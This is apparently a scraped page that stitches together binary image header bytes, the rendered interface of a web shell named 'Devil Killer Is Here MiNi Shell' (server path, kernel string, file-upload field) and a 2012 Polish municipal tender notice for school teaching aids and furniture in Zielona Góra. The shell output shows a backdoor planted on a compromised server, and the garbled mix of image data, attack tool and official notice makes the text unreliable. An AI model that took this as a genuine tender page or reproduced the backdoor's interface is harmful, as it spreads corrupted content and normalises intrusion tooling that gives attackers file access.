JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120802/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120802/167933-N-2012.html

<p class="kh_header"><b>Zielona Góra: Dostawa pomocy dydaktycznych, sprzętu i wyposażenia dla szkół podstawowych w ramach realizacji projektu pn. Indywidualizacja nauczania i wychowania uczniów klas I-III z Miasta Zielona Góra.</b><br>
<b>Numer ogłoszenia: 167933 - 2012; data zamieszczenia: 02.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta , ul. Podgórna 22, 65-424 Zielona Góra, woj. lubuskie, tel. 0684564100,4564406 do 08, faks 068 4564155, 4564455.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zielona-gora.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa pomocy dydaktycznych, sprzętu i wyposażenia dla szkół podstawowych w ramach realizacji projektu pn. Indywidualizacja nauczania i wychowania uczniów klas I-III z Miasta Zielona Góra..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest zakup wraz z dostawą pomocy dydaktycznych, sprzętu oraz wyposażenia w ramach realizacji zajęć dodatkowych wspierających indywidualizację procesu dydaktycznego w szkołach podstawowych na terenie Miasta Zielona Góra w ramach realizacji projektu pn. Indywidualizacja nauczania i wychowania uczniów klas I-III z Miasta Zielona Góra. współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.
2.	Szczegółowy opis przedmiotu zamówienia dotyczący poszczególnych części zawiera Formularz cen jednostkowych stanowiący załączniki nr 5A-F do SIWZ. Zamawiający dopuszcza możliwość składania ofert częściowych, zgodnie z wyborem Wykonawcy - na jedną, dwie, trzy, cztery, pięć lub sześć części.
3.	Przedmiot zamówienia obejmuje realizację następujących części:
3.1.	CZĘŚĆ I - Zakup i dostawa pomocy i sprzętu dydaktycznego. 
3 1.1.	Przedmiot zamówienia obejmuje zakup wraz z dostawą pomocy i sprzętu dydaktycznego do prowadzenia następujących zajęć dla dzieci:
1)	Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji;
2)	Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych;
3)	Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy;
4)	Zajęcia socjoterapeutyczne i psychoedukacyjne dla dzieci z zaburzeniami komunikacji społecznej;
5)	Gimnastyka korekcyjna dla dzieci z wadami postawy;
6)	Specjalistyczne zajęcia terapeutyczne dla dzieci niepełnosprawnych;
7)	Specjalistyczne zajęcia terapeutyczne dla dzieci;
8)	Zajęcia rozwijające zainteresowania uczniów wybitnie uzdolnionych ze szczególnym uwzględnieniem nauk matematyczno-przyrodniczych;
9)	Zajęcia rozwijające różnego rodzaju zainteresowania uczniów szczególnie uzdolnionych;
3.1.2. Rodzaj, ilość pomocy i sprzętu wraz z wymaganymi minimalnymi parametrami oraz numery szkół, do których Wykonawca powinien dostarczyć przedmiot zamówienia zawarte są 
w Formularzu cen jednostkowych stanowiącym załącznik nr 5A do SIWZ. Wykonawca zobowiązany jest dostarczyć pomoce i sprzęt dydaktyczny do szkół w pogrupowanych pakietach według załącznika nr 6 do SIWZ.
3.1.3. Wykonawca udzieli na dostarczony przedmiot zamówienia gwarancji jakości i rękojmi na okres zgodny z gwarancją producenta od dnia odbioru dostawy.
3.2.	CZĘŚĆ II - Zakup i dostawa zestawu biofeedback.
3 2.1.	Przedmiot zamówienia obejmuje zakup wraz z dostawą zestawu specjalistycznego sprzętu do zajęć terapeutycznych biofeedback umożliwiającego trening poprawiający efektywność pracy mózgu ucznia i kontrolę nad procesami fizjologicznymi zachodzącymi w organizmie.
3 2.2.	Cechy sprzętu wraz z wymaganymi minimalnymi parametrami zawarte są w Formularzu cen jednostkowych stanowiącym załącznik nr 5B do SIWZ. Wykonawca zobowiązany jest dostarczyć zestaw do SP 11 według załącznika nr 6 do SIWZ.
3 2.3.	Wykonawca udzieli na dostarczony przedmiot zamówienia gwarancji jakości i rękojmi na okres zgodny z gwarancją producenta od dnia odbioru dostawy.
3.3.	CZĘŚĆ III - Zakup i dostawa wyposażenia pracowni modelarskiej.
3 3.1.	Przedmiot zamówienia obejmuje zakup wraz z dostawą wyposażenia pracowni modelarskiej, tj.: materiałów konstrukcyjnych, elementów elektronicznych oraz narzędzi do budowy modeli latających.
3 3.2.	Rodzaj oraz ilości materiałów, elementów oraz narzędzi służących do budowy modeli latających wraz z wymaganymi minimalnymi parametrami zawarte są w Formularzu cen jednostkowych stanowiącym załącznik nr 5C do SIWZ. Wykonawca zobowiązany jest dostarczyć wyposażenie pracowni do SP 11 według załącznika nr 6 do SIWZ.
3 3.3.	Wykonawca udzieli na dostarczony przedmiot zamówienia gwarancji jakości i rękojmi
na okres zgodny z gwarancją producenta od dnia odbioru dostawy.
3.4.	CZĘŚĆ IV - Zakup i dostawa sprzętu multimedialnego i oprogramowania komputerowego.
3.4.1.	Przedmiot zamówienia obejmuje zakup wraz z dostawą następującego sprzętu multimedialnego i oprogramowania komputerowego:
1)	stacja robocza z ekranem dotykowym: 1 szt. (SP nr 1);
2)	zestaw komputerowy: 1 szt. (SP nr 8);
3)	komputer przenośny: notebook: 14 szt. (SP nr 5, SP nr 6, SP nr 8, SP nr 10 - 2 szt., SP nr 11 - 3 szt., SP nr 14, SP nr 17, SP nr 18 - 2 szt., SP nr 21, SP nr 16);
4)	pamięć przenośna (pendrive):  48 szt. (SP nr 1 - 9 szt., SP 11 - 38 szt., SP nr 21 - 1 szt.);
5)	drukarka laserowa: 3 szt. (SP nr 6, SP nr 8, SP nr 10);
6)	drukarka atramentowa kolorowa: 5 szt. (SP nr 17 - 1 szt., SP nr 11 - 4 szt.);
7)	rzutnik multimedialny: 1 szt. (SP nr 14);
8)	mysz optyczna: 12 szt. (SP nr 16);
9)	klawiatura: 13 szt. (SP nr 16);
10)	słuchawki z mikrofonem: 12 szt. (SP nr 16);
11)	radiomagnetofon/odtwarzacz CD: 23 szt. (SP nr 5 - 1 szt., SP nr 10 - 7 szt., SP nr 11 - 15 szt.);
12)	mikrofon MP3: 1 szt. (SP 21);
13)	dyktafon: 1 szt. (SP nr 17);
14)	oprogramowanie komputerowe: 1 szt. (SP nr 6);
15)	ekran do projekcji: 2 szt. (SP nr 10);
16)	elektryczny ekran projekcyjny: 1 szt. (SP nr 14); 
3.4.2.	Rodzaj, ilość sprzętu multimedialnego i oprogramowania komputerowego wraz 
z wymaganymi minimalnymi parametrami oraz numery szkół, do których Wykonawca powinien dostarczyć przedmiot zamówienia opisane są w Formularzu cen jednostkowych stanowiącym załącznik nr 5D do SIWZ. Wykonawca zobowiązany jest dostarczyć sprzęt w pogrupowanych pakietach według załącznika nr 6 do SIWZ.
3.4.3.	Wykonawca udzieli na dostarczony przedmiot zamówienia gwarancji jakości i rękojmi
na okres zgodny z gwarancją producenta od dnia odbioru dostawy.
3.5.	CZĘŚĆ V - Zakup i dostawa materiałów biurowych i eksploatacyjnych.
3.5.1.	Przedmiot zamówienia obejmuje zakup wraz z dostawą materiałów biurowych 
i eksploatacyjnych, tj.: segregatory, teczki, tonery, tusze do drukarek, papier do drukarek (ksero), płyty CD, karty do kserokopiarki.
3.5.2.	Rodzaj, ilość i wymagane cechy materiałów oraz numery szkół, do których Wykonawca powinien dostarczyć przedmiot zamówienia opisane są w Formularzu cen jednostkowych stanowiącym załącznik nr 5E do SIWZ. Wykonawca zobowiązany jest dostarczyć ww. materiały w pogrupowanych pakietach według załącznika nr 6 do SIWZ.
3.5.3.	Wykonawca udzieli na dostarczony przedmiot zamówienia gwarancji jakości i rękojmi
na okres zgodny z gwarancją producenta od dnia odbioru dostawy
3.6.	CZĘŚĆ VI - Zakup i dostawa mebli szkolnych.
3.6.1.	Przedmiot zamówienia obejmuje zakup wraz z dostawą mebli szkolnych: biurka komputerowe, fotele obrotowe, regały, szafki, szafa, stoliki uczniowskie typu Z, krzesła uczniowskie typu Z, ławki sportowe (gimnastyczne).
3.6.2.	Rodzaj, ilość, wymagane cechy i minimalne parametry mebli oraz numery szkół, do których Wykonawca powinien dostarczyć przedmiot zamówienia opisane są w Formularzu cen jednostkowych stanowiącym załącznik nr 5F do SIWZ. Wykonawca zobowiązany jest dostarczyć sprzęt w pogrupowanych pakietach według załącznika nr 6 do SIWZ.
3.6.3.	Meble powinny być zmontowane na koszt Wykonawcy. Wykonawca udzieli na dostarczony przedmiot zamówienia gwarancji jakości i rękojmi na okres zgodny z gwarancją producenta od dnia odbioru dostawy.
4.	Wykonawca składa ofertę dla każdego zadania 
5.	Wykonawca składając swoją ofertę w postępowaniu o udzielenie zamówienia publicznego akceptuje w całości i bez zastrzeżeń warunki realizacji zamówienia określone w SIWZ włącznie ze wszystkimi załącznikami, jakim podporządkowane jest niniejsze zamówienie oraz wymagania określone przez Zamawiającego.
6.	UWAGA - wypełniony przez Wykonawcę Formularz cen jednostkowych stanowiący załączniki nr 5 A-F do SIWZ winien uwzględniać ewentualne zmiany w opisie przedmiotu zamówienia wprowadzone przez Zamawiającego przed upływem terminu składania ofert - Wykonawca winien dołączyć do oferty w przypadku zmian w SIWZ ostateczną wersję opisu przedmiotu zamówienia.
7.	Wykonawcy zobowiązani są do dokładnego zapoznania się i zastosowania do wszystkich instrukcji, załączników i warunków umowy oraz specyfikacji zawartych w niniejszej SIWZ.
8.	Wszystkie pomoce, sprzęt dydaktyczny oraz wyposażenie muszą być fabrycznie nowe, wolne od wad oraz dopuszczone do stosowania w placówkach oświatowych. Muszą posiadać odpowiednie atesty, certyfikaty, świadectwa jakości i spełniać wszelkie wymogi norm określonych obowiązującym prawem. Zamawiający informuje, iż wskazanie nazw zwyczajowych czy producentów w zamieszczonych elementach opisu przedmiotu zamówienia służy wyłącznie określeniu cech technicznych i jakościowych oraz wynika z konieczności wykorzystania środka dydaktycznego o określonych cechach dla osiągnięcia zamierzonych celów Projektu oraz osiągnięcia efektów dydaktyczno-wychowawczych przez uczniów klas I-III szkół podstawowych. Ilekroć w treści SIWZ, użyte są znaki towarowe, patenty lub pochodzenie, a także normy, Zamawiający dopuszcza rozwiązanie równoważne, pod warunkiem, 
iż oferowany asortyment będzie o takich samych lub lepszych parametrach technicznych, merytorycznych, cechach użytkowych, jakościowych i funkcjonalnych. 
9.	Dostawa odbędzie się transportem Wykonawcy oraz na jego koszt i ryzyko..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6, 39.16.21.10-9, 22.11.00.00-4, 37.52.41.00-8, 37.40.00.00-2, 44.10.00.00-1, 31.70.00.00-3, 30.23.60.00-2, 30.21.30.00-5, 30.21.31.00-6, 30.23.45.00-3, 48.00.00.00-8, 30.19.00.00-7, 39.16.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 10.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie wymaga się wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy spełniający warunki zawarte w art. 22 ust. 1 pkt 1 ustawy pzp.
Ocena spełniania warunku udziału w postępowaniu zostanie dokonana zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w pkt 6.1.3) SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy spełniający warunki zawarte w art. 22 ust. 1 pkt 2 ustawy pzp. 
Ocena spełniania warunku udziału w postępowaniu zostanie dokonana zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w pkt 6.1.3) i 6.1.6) SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy spełniający warunki zawarte w art. 22 ust. 1 pkt 3 ustawy pzp. 
Ocena spełniania warunku udziału w postępowaniu zostanie dokonana zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w pkt 6.1.3) i 6.1.6) SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy spełniający warunki zawarte w art. 22 ust. 1 pkt 3 ustawy pzp.
Ocena spełniania warunku udziału w postępowaniu zostanie dokonana zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w pkt 6.1.3) i 6.1.6) SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy spełniający warunki zawarte w art. 22 ust. 1 pkt 4 ustawy. 
Ocena spełniania warunku udziału w postępowaniu zostanie dokonana zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w pkt 6.1.3) i 6.1.6) SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Dokumenty:
1)	wypełniony formularz oferty wg załącznika Nr 1 do SIWZ;
2)	oświadczenie, że Wykonawca wykona zamówienie własnymi siłami lub określi część zamówienia, której wykonanie powierzy podwykonawcom wg załącznika Nr 2 do SIWZ; 
3)	pisemne zobowiązanie, o którym mowa w pkt 5.2. SIWZ, o ile Wykonawca polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy pzp;
4)	pełnomocnictwo lub inny dokument określający zakres umocowania do reprezentowania Wykonawcy, o ile ofertę składa pełnomocnik Wykonawcy;
5)	wypełniony Formularz cen jednostkowych stanowiący wg  załączników nr 5 A-F do SIWZ (zgodnie z wyborem Wykonawcy - na jedną, dwie, trzy, cztery, pięć lub sześć części).

2. 	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o którym mowa w pkt 6.1.5) SIWZ składa dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzający odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości;
Dokument powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
3. 	Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentu, o którym mowa w pkt 6.2. SIWZ, zastępuje się go dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. 
4. 	Jeżeli Wykonawca, wykazując spełnianie warunków udziału w postępowaniu, o których mowa 
w pkt 5.1. SIWZ polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy pzp, a podmioty te będą brały udział w realizacji części zamówienia Wykonawca zobowiązany jest w odniesieniu do tych podmiotów przedstawić dokumenty, o których mowa w pkt 6.1.4.) - 6.1.5) SIWZ, z zastrzeżeniem pkt 6.2. - 6.3. SIWZ;
5. 	Wymienione w pkt 6.1. - 6.4. SIWZ dokumenty i oświadczenia muszą być załączone do oferty.
6. 	Zgodnie z art. 26 ust. 3 ustawy pzp Zamawiający wezwie Wykonawców, którzy w określonym terminie nie złożyli wymaganych oświadczeń lub dokumentów, o których mowa w pkt 6.1.3) - 6.1.6) SIWZ, lub którzy nie złożyli pełnomocnictw, albo którzy złożyli wymagane dokumenty i oświadczenia zawierające błędy lub którzy złożyli wadliwe pełnomocnictwa, do ich złożenia w wyznaczonym terminie, chyba że mimo ich złożenia oferta Wykonawcy podlegać będzie odrzuceniu lub konieczne byłoby unieważnienie postępowania. Złożone na wezwanie dokumenty i oświadczenia powinny potwierdzać spełnianie przez Wykonawcę warunków udziału w postępowaniu oraz spełnienie przez oferowane dostawy, usługi lub roboty budowlane wymagań określonych przez Zamawiającego, nie później niż w dniu, w którym upłynął termin składania ofert.
7. 	Składane dokumenty muszą być przedstawione w formie oryginału, za wyjątkiem dokumentów o których mowa w pkt 6.1.4) - 6.1.5) SIWZ, które mogą być przedstawione w formie kserokopii poświadczonej na każdej stronie za zgodność z oryginałem przez Wykonawcę lub upełnomocnionego przedstawiciela Wykonawcy, z zastrzeżeniem pkt. 6.8. SIWZ.
8. 	Kopie dokumentów dotyczących podmiotów, o których mowa w pkt 6.4. SIWZ poświadczają za zgodność z oryginałem te podmioty.
9. 	Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu wyłącznie wtedy, gdy przedstawiona przez Wykonawcę kopia dokumentu jest nieczytelna lub budzi wątpliwości co do jej prawdziwości.
10. 	W przypadku dokumentów, o których mowa w pkt 6.1.4) - 6.1.5) SIWZ sporządzonych w języku obcym, należy je złożyć wraz z tłumaczeniem na język polski. 
11. Jeżeli w treści dokumentów i oświadczeń, o których mowa w pkt 6.1.4) - 6.1.7) SIWZ podane zostały wartości kwotowe wyrażone w walutach innych niż złoty polski zostaną one przeliczone wg Tabeli A kursów średnich walut obcych Narodowego Banku Polskiego z dnia zamieszczenia ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych.
12. 	Z treści dokumentów i oświadczeń, o których mowa w pkt 6.1. - 6.11. SIWZ musi wynikać jednoznacznie, iż postawione przez Zamawiającego warunki i wymagania zostały spełnione.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>zgodnie z pkt 39 SIWZ</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.zielona-gora.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ w formie papierowej można odbierać w siedzibie Zamawiającego nr pokoju 408 osobiście po okazaniu dowodu wniesienia opłaty w kasie urzędu w wysokości 18,00 zł (25,10 zł przy przesyłce pocztą).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.08.2012 godzina 10:00, miejsce: w siedzibie Zamawiającego tj. w Urzędzie Miasta Zielona Góra, 65-424 Zielona Góra, ul. Podgórna 22, pokój 408.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




